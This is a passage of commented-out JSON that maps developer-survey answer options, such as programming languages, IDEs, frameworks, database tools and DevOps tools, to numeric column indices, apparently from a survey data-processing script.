# "js_moduleloader.Webpack": 1263,
# "js_moduleloader.RequireJS": 1264,
# "js_moduleloader.SystemJS": 1265,
# "js_moduleloader.Rollup": 1266,
# "js_moduleloader.Parcel": 1267,
# "js_moduleloader.Other": 1268
# },
# "ruby_version": {
# "ruby_version.Ruby 2_6": 1053,
# "ruby_version.Ruby 2_5": 1054,
# "ruby_version.Ruby 2_4": 1055,
# "ruby_version.Ruby 2_3": 1056,
# "ruby_version.Ruby 2_2": 1057,
# "ruby_version.Ruby 2_1": 1058,
# "ruby_version.Ruby 2_0": 1059,
# "ruby_version.Ruby 1_9": 1060,
# "ruby_version.Ruby 1_8": 1061,
# "ruby_version.Other": 1062,
# "ruby_version_management.None": 1063,
# "ruby_version_management.RVM": 1064,
# "ruby_version_management.Rbenv": 1065,
# "ruby_version_management.Asdf": 1066,
# "ruby_version_management.Chruby": 1067,
# "ruby_version_management.Docker": 1068,
# "ruby_version_management.Other": 1069
# },
# "ruby_gemmanagement": {
# "ruby_gemmanagement.None": 1070,
# "ruby_gemmanagement.Bundler": 1071,
# "ruby_gemmanagement.RVM gemsets": 1072,
# "ruby_gemmanagement.Rbenv gemsets": 1073,
# "ruby_gemmanagement.Other": 1074
# },
# "ruby_gems_count": {
# "ruby_gems_count": 1075
# },
# "ruby_frameworks": {
# "ruby_frameworks.None": 1076,
# "ruby_frameworks.Ruby on Rails": 1077,
# "ruby_frameworks.Rack": 1078,
# "ruby_frameworks.Sinatra": 1079,
# "ruby_frameworks.Padrino": 1080,
# "ruby_frameworks.Hanami": 1081,
# "ruby_frameworks.Hyperstack": 1082,
# "ruby_frameworks.Opal": 1083,
# "ruby_frameworks.Other": 1084
# },
# "ruby_rails_version": {
# "ruby_rails_version": 1085,
# "ruby_rails_version_migrate": 1086
# },
# "ruby_servers": {
# "ruby_servers.None": 1087,
# "ruby_servers.Unicorn": 1088,
# "ruby_servers.Puma": 1089,
# "ruby_servers.Passenger": 1090,
# "ruby_servers.Thin": 1091,
# "ruby_servers.Other": 1092
# },
# "ruby_ide": {
# "ruby_ide": 1093
# },
# "ruby_unittesting": {
# "ruby_unittesting.None": 1094,
# "ruby_unittesting.Shoulda": 1095,
# "ruby_unittesting.RSpec": 1096,
# "ruby_unittesting.Cucumber": 1097,
# "ruby_unittesting.MiniTest": 1098,
# "ruby_unittesting.TestUnit": 1099,
# "ruby_unittesting.Other": 1100
# },
# "swiftoc_unittesting": {
# "swiftoc_unittesting.None": 1108,
# "swiftoc_unittesting.XCTest": 1109,
# "swiftoc_unittesting.Quick + Nimble": 1110,
# "swiftoc_unittesting.Kiwi": 1111,
# "swiftoc_unittesting.Specta": 1112,
# "swiftoc_unittesting.Other": 1113
# },
# "swiftoc_ui_tests": {
# "swiftoc_ui_tests": 1122
# },
# "swiftoc_dependecymanager": {
# "swiftoc_dependecymanager.None": 1129,
# "swiftoc_dependecymanager.CocoaPods": 1130,
# "swiftoc_dependecymanager.Carthage": 1131,
# "swiftoc_dependecymanager.Swift Package Manager": 1132,
# "swiftoc_dependecymanager.Other": 1133
# },
# "swiftoc_db_engine": {
# "swiftoc_db_engine.None": 1134,
# "swiftoc_db_engine.SQLite with my own wrapper": 1135,
# "swiftoc_db_engine.CoreData": 1136,
# "swiftoc_db_engine.Realm": 1137,
# "swiftoc_db_engine.Firebase": 1138,
# "swiftoc_db_engine.YAPDataBase": 1139,
# "swiftoc_db_engine.Other": 1140
# },
# "swiftoc_build": {
# "swiftoc_build.I build my project from the IDE": 1143,
# "swiftoc_build.I use Fastlane": 1144,
# "swiftoc_build.I build on CI": 1145,
# "swiftoc_build.Other": 1146
# },
# "swiftoc_linux": {
# "swiftoc_linux.Yes": 1147,
# "swiftoc_linux.No, but I plan to in the next 12 months": 1148,
# "swiftoc_linux.No, and I don\u2019t plan to in the next 12 months": 1149
# },
# "sql_mssql": {
# "sql_mssql.2017": 1364,
# "sql_mssql.2016": 1365,
# "sql_mssql.2014": 1366,
# "sql_mssql.2012": 1367,
# "sql_mssql.2008 R2": 1368,
# "sql_mssql.2008": 1369,
# "sql_mssql.2005": 1370,
# "sql_mssql.2000": 1371,
# "sql_mssql.I'm not sure": 1372
# },
# "sql_mysql": {
# "sql_mysql.8_0": 1380,
# "sql_mysql.5_7": 1381,
# "sql_mysql.5_6": 1382,
# "sql_mysql.5_5": 1383,
# "sql_mysql.5_4": 1384,
# "sql_mysql.I'm not sure": 1385,
# "sql_mysql.Other": 1386
# },
# "sql_postgresql": {
# "sql_postgresql.11": 1387,
# "sql_postgresql.10": 1388,
# "sql_postgresql.9_6": 1389,
# "sql_postgresql.9_5": 1390,
# "sql_postgresql.9_4": 1391,
# "sql_postgresql.9_3": 1392,
# "sql_postgresql.9_2": 1393,
# "sql_postgresql.9_1": 1394,
# "sql_postgresql.9_0": 1395,
# "sql_postgresql.I'm not sure": 1396,
# "sql_postgresql.Other": 1397
# },
# "sql_db2": {
# "sql_db2.11_x": 1398,
# "sql_db2.10_x": 1399,
# "sql_db2.9_x": 1400,
# "sql_db2.8_x": 1401,
# "sql_db2.7_x": 1402,
# "sql_db2.Other": 1403
# },
# "sql_sqlite": {
# "sql_sqlite": 1404
# },
# "sql_tool": {
# "sql_tool.None": 1405,
# "sql_tool.MySQL Workbench": 1406,
# "sql_tool.pgAdmin": 1407,
# "sql_tool.Oracle SQL Developer": 1408,
# "sql_tool.SQL Server Management Studio": 1409,
# "sql_tool.DataGrip": 1410,
# "sql_tool.phpMyAdmin": 1411,
# "sql_tool.Navicat": 1412,
# "sql_tool.Toad": 1413,
# "sql_tool.EMS SQL Manager": 1414,
# "sql_tool.dbForge Studio": 1415,
# "sql_tool.HeidiSQL": 1416,
# "sql_tool.DbVisualizer": 1417,
# "sql_tool.DBeaver": 1418,
# "sql_tool.Sequel Pro": 1419,
# "sql_tool.SQuirreL SQL": 1420,
# "sql_tool.Command Line": 1421,
# "sql_tool.JetBrains IDE(s) (IntelliJ IDEA, PhpStorm, etc_) with the Database plugin": 1422,
# "sql_tool.Robo 3T": 1423,
# "sql_tool.PL / SQL Developer": 1424,
# "sql_tool.Other": 1425
# },
# "use_static_analysis": {
# "use_static_analysis": 1568
# },
# "regularly_tools": {
# "regularly_tools.Source code collaboration tool (e_g_ GitHub, GitLab, Bitbucket)": 342,
# "regularly_tools.Issue tracker (e_g_ Jira, YouTrack)": 343,
# "regularly_tools.Code review tool (e_g_ Crucible, Upsource)": 344,
# "regularly_tools.Continuous Integration (CI) or Continuous Delivery (CD) tool (e_g_ Jenkins, TeamCity)": 345,
# "regularly_tools.Static analysis tool (e_g_ CodeClimate)": 346,
# "regularly_tools.Standalone IDE (e_g_ Eclipse, IntelliJ IDEA)": 347,
# "regularly_tools.Lightweight Desktop Editor (e_g_ Sublime Text, Atom, VS Code, Vim)": 348,
# "regularly_tools.In-cloud Editor or IDE": 349,
# "regularly_tools.None": 350
# },
# "visit_meetups": {
# "visit_meetups.Yes": 1611,
# "visit_meetups.No, but I am planning to": 1612,
# "visit_meetups.No, since there are no meetups in my area": 1613,
# "visit_meetups.No, I am unable to do so for certain reasons": 1614,
# "visit_meetups.No, and I do not want to": 1615,
# "visit_meetups.Other": 1616
# },
# "it_experience": {
# "it_experience.None": 1722,
# "it_experience.Less than 1 year": 1723,
# "it_experience.1 - 2 years": 1724,
# "it_experience.3 - 5 years": 1725,
# "it_experience.6 - 10 years": 1726,
# "it_experience.11+ years": 1727
# },
# "ruby_rails_version_migrate": {
# "ruby_rails_version_migrate": 1086
# },
# "scala_java_version": {
# "scala_java_version.Java 11": 1163,
# "scala_java_version.Java 10": 1164,
# "scala_java_version.Java 9": 1165,
# "scala_java_version.Java 8": 1166,
# "scala_java_version.Java 7": 1167,
# "scala_java_version.Other": 1168
# },
# "scala_frameworks_web": {
# "scala_frameworks_web.None": 1178,
# "scala_frameworks_web.Akka-http": 1179,
# "scala_frameworks_web.Netty": 1180,
# "scala_frameworks_web.Spark Java": 1181,
# "scala_frameworks_web.Play": 1182,
# "scala_frameworks_web.Spray": 1183,
# "scala_frameworks_web.Scalatra": 1184,
# "scala_frameworks_web.Finatra": 1185,
# "scala_frameworks_web.Spring": 1186,
# "scala_frameworks_web.sttp": 1187,
# "scala_frameworks_web.Http4s": 1188,
# "scala_frameworks_web.Other": 1189
# },
# "scala_ide": {
# "scala_ide.IntelliJ IDEA": 1204,
# "scala_ide.Other": 1205
# },
# "scala_buildsystem": {
# "scala_buildsystem.Maven": 1206,
# "scala_buildsystem.Gradle": 1207,
# "scala_buildsystem.sbt": 1208,
# "scala_buildsystem.Other": 1209
# },
# "scala_macros": {
# "scala_macros.Yes, including whitebox macros": 1226,
# "scala_macros.Only blackbox macros": 1227,
# "scala_macros.Only in libraries": 1228,
# "scala_macros.No": 1229,
# "scala_macros.I don\u2019t know anything about macros in Scala": 1230
# },
# "dev_for_desk_os": {
# "dev_for_desk_os.Windows": 49,
# "dev_for_desk_os.Unix / Linux": 50,
# "dev_for_desk_os.macOS": 51,
# "dev_for_desk_os.Other": 52
# },
# "php_frameworks": {
# "php_frameworks.None": 888,
# "php_frameworks.Symfony": 889,
# "php_frameworks.Drupal": 890,
# "php_frameworks.WordPress": 891,
# "php_frameworks.Zend": 892,
# "php_frameworks.Magento": 893,
# "php_frameworks.Laravel": 894,
# "php_frameworks.Joomla!": 895,
# "php_frameworks.Yii": 896,
# "php_frameworks.CakePHP": 897,
# "php_frameworks.CodeIgniter": 898,
# "php_frameworks.Slim": 899,
# "php_frameworks.Other": 900
# },
# "devops_conf_management": {
# "devops_conf_management.None": 1485,
# "devops_conf_management.Puppet": 1486,
# "devops_conf_management.Chef": 1487,
# "devops_conf_management.Ansible": 1488,
# "devops_conf_management.Salt": 1489,
# "devops_conf_management.Custom solution": 1490,
# "devops_conf_management.Other": 1491
# },
# "ruby_version_management": {
# "ruby_version_management.None": 1063,
# "ruby_version_management.RVM": 1064,
# "ruby_version_management.Rbenv": 1065,
# "ruby_version_management.Asdf": 1066,
# "ruby_version_management.Chruby": 1067,
# "ruby_version_management.Docker": 1068,
# "ruby_version_management.Other": 1069
# },
# "agile_framework": {
# "agile_framework.None": 1714,
# "agile_framework.Scrum": 1715,
# "agile_framework.Kanban": 1716,
# "agile_framework.XP": 1717,
# "agile_framework.Combined": 1718,
# "agile_framework.Other": 1719
# },
# "hours_code_hobby": {
# "hours_code_hobby.I don\u2019t have a side project": 1570,
# "hours_code_hobby.Less than 1 hour a week": 1571,
# "hours_code_hobby.1-2 hours a week": 1572,
# "hours_code_hobby.3-8 hours a week": 1573,
# "hours_code_hobby.9-16 hours a week": 1574,
# "hours_code_hobby.17-32 hours a week": 1575,
# "hours_code_hobby.32 hours a week or more": 1576
# },
# "code_weekends": {
# "code_weekends.Yes": 1585,
# "code_weekends.No": 1586
# },
# "app_type_hobby": {
# "app_type_hobby.I don't develop anything for free / only as a hobby": 36,
# "app_type_hobby.Web Back-end": 37,
# "app_type_hobby.Web Front-end": 38,
# "app_type_hobby.Mobile applications": 39,
# "app_type_hobby.Desktop": 40,
# "app_type_hobby.Data analysis": 41,
# "app_type_hobby.BI": 42,
# "app_type_hobby.Machine learning": 43,
# "app_type_hobby.Embedded / IoT": 44,
# "app_type_hobby.Games": 45,
# "app_type_hobby.Libraries / Frameworks": 46,
# "app_type_hobby.Other Back-end": 47,
# "app_type_hobby.Other": 48
# },
# "ides": {
# "ides.RStudio": 351,
# "ides.IntelliJ IDEA": 352,
# "ides.Android Studio": 353,
# "ides.Visual Studio": 354,
# "ides.Xcode": 355,
# "ides.PhpStorm": 356,
# "ides.WebStorm": 357,
# "ides.RubyMine": 358,
# "ides.PyCharm": 359,
# "ides.Vim": 360,
# "ides.Sublime Text": 361,
# "ides.Atom": 362,
# "ides.VS Code (Visual Studio Code)": 363,
# "ides.Notepad++": 364,
# "ides.AppCode": 365,
# "ides.CLion": 366,
# "ides.Eclipse": 367,
# "ides.NetBeans": 368,
# "ides.QtCreator": 369,
# "ides.Emacs": 370,
# "ides.JetBrains Rider": 371,
# "ides.Gedit": 372,
# "ides.IPython/Jupyter Notebook": 373,
# "ides.DataGrip": 374,
# "ides.GoLand": 375,
# "ides.Other": 376
# },
# "mobile_os_how": {
# "mobile_os_how.I use native tools (Swift / Objective-C for iOS, Kotlin / Android, etc)": 79,
# "mobile_os_how.I use cross-platform technologies / frameworks (Xamarin, Apache Cordova, Ionic, etc)": 80
# },
# "crossplatform_framework": {
# "crossplatform_framework.Apache Flex": 81,
# "crossplatform_framework.Corona": 82,
# "crossplatform_framework.Ionic": 83,
# "crossplatform_framework.Kivy": 84,
# "crossplatform_framework.Sencha": 85,
# "crossplatform_framework.Dojo": 86,
# "crossplatform_framework.Titanium": 87,
# "crossplatform_framework.Kendo UI": 88,
# "crossplatform_framework.Xamarin": 89,
# "crossplatform_framework.Cordova": 90,
# "crossplatform_framework.Unity": 91,
# "crossplatform_framework.React Native": 92,
# "crossplatform_framework.Flutter": 93,
# "crossplatform_framework.PhoneGap": 94,
# "crossplatform_framework.NativeScript": 95,
# "crossplatform_framework.Other": 96
# },
# "python_for": {
# "python_for.Educational purposes": 730,
# "python_for.Data analysis": 731,
# "python_for.System administration / Writing automation scripts / Infrastructure configuration (DevOps)": 732,
# "python_for.Software testing / writing automated tests": 733,
# "python_for.Software prototyping": 734,
# "python_for.Web development": 735,
# "python_for.Programming of web parsers / scrapers / crawlers": 736,
# "python_for.Machine learning": 737,
# "python_for.Network programming": 738,
# "python_for.Desktop development": 739,
# "python_for.Computer graphics": 740,
# "python_for.Game development": 741,
# "python_for.Mobile development": 742,
# "python_for.Embedded development": 743,
# "python_for.Other": 744
# },
# "csharp_os": {
# "csharp_os.Windows": 835,
# "csharp_os.Unix / Linux": 836,
# "csharp_os.macOS": 837,
# "csharp_os.Other": 838
# },
# "csharp_vsc_plugins": {
# "csharp_vsc_plugins.None": 839,
# "csharp_vsc_plugins.C# for Visual Studio Code (powered by OmniSharp)": 840,
# "csharp_vsc_plugins.NuGet Package Manager": 841,
# "csharp_vsc_plugins.C# Extensions": 842,
# "csharp_vsc_plugins.C# XML Documentation Comments": 843,
# "csharp_vsc_plugins.Code Runner": 844,
# "csharp_vsc_plugins.ESLint": 845,
# "csharp_vsc_plugins.TSLint": 846,
# "csharp_vsc_plugins.ASP_NET Helper": 847,
# "csharp_vsc_plugins.C# snippets": 848,
# "csharp_vsc_plugins.Other": 849
# },
# "csharp_msdn": {
# "csharp_msdn": 868,
# "csharp_msdn_type": 869
# },
# "csharp_tfs": {
# "csharp_tfs.No": 870,
# "csharp_tfs.TFS": 871,
# "csharp_tfs.VSTS": 872
# },
# "scala_version": {
# "scala_version.2_13": 1155,
# "scala_version.2_12": 1156,
# "scala_version.2_11": 1157,
# "scala_version.2_10 or older": 1158,
# "scala_version.Other": 1159
# },
# "scala_compilationtarget": {
# "scala_compilationtarget.JVM": 1160,
# "scala_compilationtarget.scala_js": 1161,
# "scala_compilationtarget.Other": 1162
# },
# "scala_unittesting": {
# "scala_unittesting.None": 1169,
# "scala_unittesting.ScalaTest": 1170,
# "scala_unittesting.ScalaMock": 1171,
# "scala_unittesting.TestNG": 1172,
# "scala_unittesting.JUnit": 1173,
# "scala_unittesting.ScalaCheck": 1174,
# "scala_unittesting.specs2": 1175,
# "scala_unittesting.\u00b5Test": 1176,
# "scala_unittesting.Other": 1177
# },
# "proglang_rank": {
# "proglang_rank.Java": 208,
# "proglang_rank.C": 209,
# "proglang_rank.C++": 210,
# "proglang_rank.Python": 211,
# "proglang_rank.C#": 212,
# "proglang_rank.PHP": 213,
# "proglang_rank.JavaScript": 214,
# "proglang_rank.Ruby": 215,
# "proglang_rank.Kotlin": 216,
# "proglang_rank.Swift": 217,
# "proglang_rank.Objective-C": 218,
# "proglang_rank.Scala": 219,
# "proglang_rank.Go": 220,
# "proglang_rank.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 221,
# "proglang_rank.Rust": 222,
# "proglang_rank.Haskell": 223,
# "proglang_rank.HTML / CSS": 224,
# "proglang_rank.Elixir": 225,
# "proglang_rank.Crystal": 226,
# "proglang_rank.Visual Basic": 227,
# "proglang_rank.R": 228,
# "proglang_rank.TypeScript": 229,
# "proglang_rank.Dart": 230,
# "proglang_rank.CoffeeScript": 231,
# "proglang_rank.Clojure / ClojureScript": 232,
# "proglang_rank.Delphi": 233,
# "proglang_rank.Cobol": 234,
# "proglang_rank.Groovy": 235,
# "proglang_rank.Perl": 236,
# "proglang_rank.Assembly": 237,
# "proglang_rank.Matlab": 238,
# "proglang_rank.Lua": 239,
# "proglang_rank.Shell scripting languages(bash/shell/powershell)": 240,
# "proglang_rank.Julia": 241,
# "proglang_rank.F#": 242,
# "proglang_rank.Other": 243
# },
# "python_other_techs": {
# "python_other_techs.None": 785,
# "python_other_techs.Sphinx": 786,
# "python_other_techs.Buildout": 787,
# "python_other_techs.ORM": 788,
# "python_other_techs.Other": 789
# },
# "kotlin_how_long": {
# "kotlin_how_long": 1033
# },
# "scala_frameworks": {
# "scala_frameworks_web.None": 1178,
# "scala_frameworks_web.Akka-http": 1179,
# "scala_frameworks_web.Netty": 1180,
# "scala_frameworks_web.Spark Java": 1181,
# "scala_frameworks_web.Play": 1182,
# "scala_frameworks_web.Spray": 1183,
# "scala_frameworks_web.Scalatra": 1184,
# "scala_frameworks_web.Finatra": 1185,
# "scala_frameworks_web.Spring": 1186,
# "scala_frameworks_web.sttp": 1187,
# "scala_frameworks_web.Http4s": 1188,
# "scala_frameworks_web.Other": 1189,
# "scala_frameworks.None": 1190,
# "scala_frameworks.Scala_js": 1191,
# "scala_frameworks.Twitter Util": 1192,
# "scala_frameworks.Akka": 1193,
# "scala_frameworks.Spark": 1194,
# "scala_frameworks.Scalaz": 1195,
# "scala_frameworks.Scalacheck": 1196,
# "scala_frameworks.Specs2": 1197,
# "scala_frameworks.Shapeless": 1198,
# "scala_frameworks.Finagle": 1199,
# "scala_frameworks.Cats": 1200,
# "scala_frameworks.Breeze": 1201,
# "scala_frameworks.Slick": 1202,
# "scala_frameworks.Other": 1203
# },
# "scala_sbt": {
# "scala_sbt.1_0": 1210,
# "scala_sbt.0_13 or older": 1211
# },
# "scala_interactive": {
# "scala_interactive.None": 1212,
# "scala_interactive.Scala REPL": 1213,
# "scala_interactive.sbt console": 1214,
# "scala_interactive.Ammonite REPL": 1215,
# "scala_interactive.Scastie": 1216,
# "scala_interactive.IntelliJ IDEA Worksheet": 1217,
# "scala_interactive.Scala IDE Worksheet": 1218,
# "scala_interactive.Apache Zeppelin Notebook": 1219,
# "scala_interactive.Jupyter Notebook": 1220,
# "scala_interactive.Other": 1221
# },
# "scala_compiler_plugins": {
# "scala_compiler_plugins.None": 1222,
# "scala_compiler_plugins.Scalamacros/Scalameta Paradise": 1223,
# "scala_compiler_plugins.Kind Projector": 1224,
# "scala_compiler_plugins.Other": 1225
# },
# "go_multipleversions": {
# "go_multipleversions": 1427
# },
# "go_gopath": {
# "go_gopath": 1428
# },
# "go_multipleprojects": {
# "go_multipleprojects": 1429
# },
# "go_packagemanager": {
# "go_packagemanager.None": 1436,
# "go_packagemanager.dep": 1437,
# "go_packagemanager.godep": 1438,
# "go_packagemanager.glide": 1439,
# "go_packagemanager.govendor": 1440,
# "go_packagemanager.Go Modules": 1441,
# "go_packagemanager.gpm": 1442,
# "go_packagemanager.Other": 1443,
# "go_packagemanager_migrate.No, I don't plan to": 1445,
# "go_packagemanager_migrate.Yes, planning to adopt / migrate to other package manager(s) - Write in": 1446,
# "go_packagemanager_migrate.dep": 1447,
# "go_packagemanager_migrate.godep": 1448,
# "go_packagemanager_migrate.Go Modules": 1449
# },
# "go_packagemanager_migrate": {
# "go_packagemanager_migrate.No, I don't plan to": 1445,
# "go_packagemanager_migrate.Yes, planning to adopt / migrate to other package manager(s) - Write in": 1446,
# "go_packagemanager_migrate.dep": 1447,
# "go_packagemanager_migrate.godep": 1448,
# "go_packagemanager_migrate.Go Modules": 1449
# },
# "go_frameworks": {
# "go_frameworks.None": 1450,
# "go_frameworks.Buffalo": 1451,
# "go_frameworks.Gin": 1452,
# "go_frameworks.Macaron": 1453,
# "go_frameworks.Echo": 1454,
# "go_frameworks.Beego": 1455,
# "go_frameworks.Revel": 1456,
# "go_frameworks.Other": 1457
# },
# "go_router": {
# "go_router.None": 1458,
# "go_router.standard library": 1459,
# "go_router.gorilla / mux": 1460,
# "go_router.go-chi / chi": 1461,
# "go_router.julienschmidt / httproute": 1462,
# "go_router.gocraft / web": 1463,
# "go_router.Other": 1464
# },
# "go_testing": {
# "go_testing.None": 1465,
# "go_testing.built-in testing": 1466,
# "go_testing.gocheck": 1467,
# "go_testing.testify": 1468,
# "go_testing.ginkgo": 1469,
# "go_testing.gomega": 1470,
# "go_testing.goconvey": 1471,
# "go_testing.gomock": 1472,
# "go_testing.go-sqlmock": 1473,
# "go_testing.httpexpect": 1474,
# "go_testing.Other": 1475
# },
# "go_external_deps": {
# "go_external_deps": 1476
# },
# "go_code_size": {
# "go_code_size": 1477
# },
# "primary_proglang": {
# "primary_proglang.Java": 134,
# "primary_proglang.C": 135,
# "primary_proglang.C++": 136,
# "primary_proglang.Python": 137,
# "primary_proglang.C#": 138,
# "primary_proglang.PHP": 139,
# "primary_proglang.JavaScript": 140,
# "primary_proglang.Ruby": 141,
# "primary_proglang.Kotlin": 142,
# "primary_proglang.Swift": 143,
# "primary_proglang.Objective-C": 144,
# "primary_proglang.Scala": 145,
# "primary_proglang.Go": 146,
# "primary_proglang.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 147,
# "primary_proglang.Rust": 148,
# "primary_proglang.Haskell": 149,
# "primary_proglang.HTML / CSS": 150,
# "primary_proglang.Elixir": 151,
# "primary_proglang.Crystal": 152,
# "primary_proglang.Visual Basic": 153,
# "primary_proglang.R": 154,
# "primary_proglang.TypeScript": 155,
# "primary_proglang.Dart": 156,
# "primary_proglang.CoffeeScript": 157,
# "primary_proglang.Clojure / ClojureScript": 158,
# "primary_proglang.Delphi": 159,
# "primary_proglang.Cobol": 160,
# "primary_proglang.Groovy": 161,
# "primary_proglang.Perl": 162,
# "primary_proglang.Assembly": 163,
# "primary_proglang.Matlab": 164,
# "primary_proglang.Lua": 165,
# "primary_proglang.Shell scripting languages(bash/shell/powershell)": 166,
# "primary_proglang.Julia": 167,
# "primary_proglang.F#": 168,
# "primary_proglang.Other": 169
# },
# "kotlin_languages_before": {
# "kotlin_languages_before.Java": 1041,
# "kotlin_languages_before.JavaScript/TypeScript": 1042,
# "kotlin_languages_before.C/C++": 1043,
# "kotlin_languages_before.C#": 1044,
# "kotlin_languages_before.PHP": 1045,
# "kotlin_languages_before.Ruby": 1046,
# "kotlin_languages_before.Scala": 1047,
# "kotlin_languages_before.Go": 1048,
# "kotlin_languages_before.Groovy": 1049,
# "kotlin_languages_before.Python": 1050,
# "kotlin_languages_before.Swift": 1051,
# "kotlin_languages_before.Other": 1052
# },
# "devops_server_templating": {
# "devops_server_templating.None": 1492,
# "devops_server_templating.Docker": 1493,
# "devops_server_templating.Vagrant": 1494,
# "devops_server_templating.Packer": 1495,
# "devops_server_templating.CoreOS rkt": 1496,
# "devops_server_templating.Other": 1497
# },
# "devops_use_compose": {
# "devops_use_compose": 1508
# },
# "devops_container_orchestration": {
# "devops_container_orchestration.None": 1509,
# "devops_container_orchestration.Amazon ECS / Fargate": 1510,
# "devops_container_orchestration.Amazon EKS": 1511,
# "devops_container_orchestration.Mesos or DC / OS": 1512,
# "devops_container_orchestration.Kubernetes (self-managed or fully managed)": 1513,
# "devops_container_orchestration.Hashicorp Nomad": 1514,
# "devops_container_orchestration.Docker Swarm": 1515,
# "devops_container_orchestration.CoreOS Tectonic": 1516,
# "devops_container_orchestration.Other": 1517
# },
# "devops_deploy_docker_repo": {
# "devops_deploy_docker_repo.I do not deploy": 1521,
# "devops_deploy_docker_repo.I use only the command line": 1522,
# "devops_deploy_docker_repo.I use a configuration management tool (Chef, Puppet, Ansible, etc_)": 1523,
# "devops_deploy_docker_repo.I deploy from CI / CD": 1524,
# "devops_deploy_docker_repo.I deploy with custom / in-house tools": 1525,
# "devops_deploy_docker_repo.Other": 1526
# },
# "devops_keep_artifacts": {
# "devops_keep_artifacts.I don't keep artifacts": 1527,
# "devops_keep_artifacts.Pulp": 1528,
# "devops_keep_artifacts.Amazon S3": 1529,
# "devops_keep_artifacts.Archiva": 1530,
# "devops_keep_artifacts.NuGet": 1531,
# "devops_keep_artifacts.Nexus": 1532,
# "devops_keep_artifacts.JFrog Artifactory": 1533,
# "devops_keep_artifacts.MyGet": 1534,
# "devops_keep_artifacts.npm": 1535,
# "devops_keep_artifacts.Docker Hub (private or public)": 1536,
# "devops_keep_artifacts.Custom tool": 1537,
# "devops_keep_artifacts.Other": 1538
# },
# "accounts": {
# "accounts.None of the above": 1587,
# "accounts.Facebook": 1588,
# "accounts.Twitter": 1589,
# "accounts.LinkedIn": 1590,
# "accounts.QQ": 1591,
# "accounts.Qzone": 1592,
# "accounts.Baidu Tieba": 1593,
# "accounts.Quora": 1594,
# "accounts.Zhihu (\u77e5\u4e4e)": 1595,
# "accounts.XING": 1596,
# "accounts.Instagram": 1597,
# "accounts.VKontakte": 1598,
# "accounts.GitHub": 1599,
# "accounts.StackOverflow": 1600,
# "accounts.Reddit": 1601,
# "accounts.Other": 1602
# },
# "learn_pl": {
# "learn_pl.I am not learning any programming languages": 1617,
# "learn_pl.Java": 1618,
# "learn_pl.\u0421": 1619,
# "learn_pl.C++": 1620,
# "learn_pl.Python": 1621,
# "learn_pl.C#": 1622,
# "learn_pl.PHP": 1623,
# "learn_pl.JavaScript": 1624,
# "learn_pl.Ruby": 1625,
# "learn_pl.Kotlin": 1626,
# "learn_pl.Swift": 1627,
# "learn_pl.Scala": 1628,
# "learn_pl.Go": 1629,
# "learn_pl.R": 1630,
# "learn_pl.TypeScript": 1631,
# "learn_pl.Haskell": 1632,
# "learn_pl.Elixir": 1633,
# "learn_pl.Clojure": 1634,
# "learn_pl.Rust": 1635,
# "learn_pl.Other": 1636
# },
# "learn_what": {
# "learn_what.I did not learn any new tools / technologies / programming languages in the last 12 months": 1637,
# "learn_what.Offline educational organizations": 1638,
# "learn_what.Books": 1639,
# "learn_what.Personal teacher/consultant": 1640,
# "learn_what.Online coding schools": 1641,
# "learn_what.MOOCs (Coursera, edX, Udacity, etc_)": 1642,
# "learn_what.Blogs/forums": 1643,
# "learn_what.Documentation & APIs": 1644,
# "learn_what.Other": 1645
# },
# "ide_theme": {
# "ide_theme": 525
# },
# "salary": {
# "salary": 1728
# },
# "it_core": {
# "it_core": 1657
# },
# "sectors_it": {
# "sectors_it.Telecom": 1658,
# "sectors_it.Game development (including mobile games)": 1659,
# "sectors_it.Mobile development": 1660,
# "sectors_it.IoT / embedded": 1661,
# "sectors_it.IT services": 1662,
# "sectors_it.Cloud computing / platform": 1663,
# "sectors_it.Big Data / Data analysis": 1664,
# "sectors_it.Hardware": 1665,
# "sectors_it.Data center services": 1666,
# "sectors_it.Software development tools": 1667,
# "sectors_it.Internet / Search engines": 1668,
# "sectors_it.Semiconductors": 1669,
# "sectors_it.E-learning": 1670,
# "sectors_it.FinTech": 1671,
# "sectors_it.Healthcare IT": 1672,
# "sectors_it.Cybersecurity": 1673,
# "sectors_it.BPO services": 1674,
# "sectors_it.Other Software (all other types of software)": 1675,
# "sectors_it.Other": 1676
# },
# "sectors_nonit": {
# "sectors_nonit.Government and defense": 1677,
# "sectors_nonit.Administration / Management / Business Development": 1678,
# "sectors_nonit.Banking / Real Estate / Mortgage Financing / Accounting / Finance / Insurance": 1679,
# "sectors_nonit.Business / Strategic Management": 1680,
# "sectors_nonit.Construction / Architecture": 1681,
# "sectors_nonit.Customer Support": 1682,
# "sectors_nonit.Design": 1683,
# "sectors_nonit.Education / Training": 1684,
# "sectors_nonit.Human Resources": 1685,
# "sectors_nonit.Law": 1686,
# "sectors_nonit.Logistics/ Transportation": 1687,
# "sectors_nonit.Machinery": 1688,
# "sectors_nonit.Aerospace": 1689,
# "sectors_nonit.Automotive and boating": 1690,
# "sectors_nonit.Manufacturing": 1691,
# "sectors_nonit.Marketing": 1692,
# "sectors_nonit.Medicine / Health": 1693,
# "sectors_nonit.Non-profit": 1694,
# "sectors_nonit.Entertainment / Mass media and information / Publishing": 1695,
# "sectors_nonit.Restaurants / Hospitality / Tourism": 1696,
# "sectors_nonit.Sales / Distribution / Retail": 1697,
# "sectors_nonit.Food / Agriculture": 1698,
# "sectors_nonit.Science": 1699,
# "sectors_nonit.Security": 1700,
# "sectors_nonit.Service / Maintenance": 1701,
# "sectors_nonit.Energy": 1702,
# "sectors_nonit.Other": 1703
# },
# "pair_programming": {
# "pair_programming": 1720
# },
# "devops_infr_provisioning": {
# "devops_infr_provisioning.None": 1498,
# "devops_infr_provisioning.Terraform": 1499,
# "devops_infr_provisioning.CloudFormation": 1500,
# "devops_infr_provisioning.TOSCA/Cloudify": 1501,
# "devops_infr_provisioning.OpenStack Heat": 1502,
# "devops_infr_provisioning.Other": 1503
# },
# "devops_involved": {
# "devops_involved": 1484
# },
# "devops_deploy_cloud": {
# "devops_deploy_cloud.Run scripts on your local workstation / VM": 1543,
# "devops_deploy_cloud.Use Continuous Integration / Continuous Delivery": 1544,
# "devops_deploy_cloud.Use your cloud provider's web interface": 1545,
# "devops_deploy_cloud.Other": 1546
# },
# "kind_of_dev": {
# "kind_of_dev.Product development": 1704,
# "kind_of_dev.Outsourcing": 1705,
# "kind_of_dev.Custom-tailored software / websites / applications": 1706,
# "kind_of_dev.In-house development": 1707,
# "kind_of_dev.Internal deployment and maintenance of third-party tools": 1708,
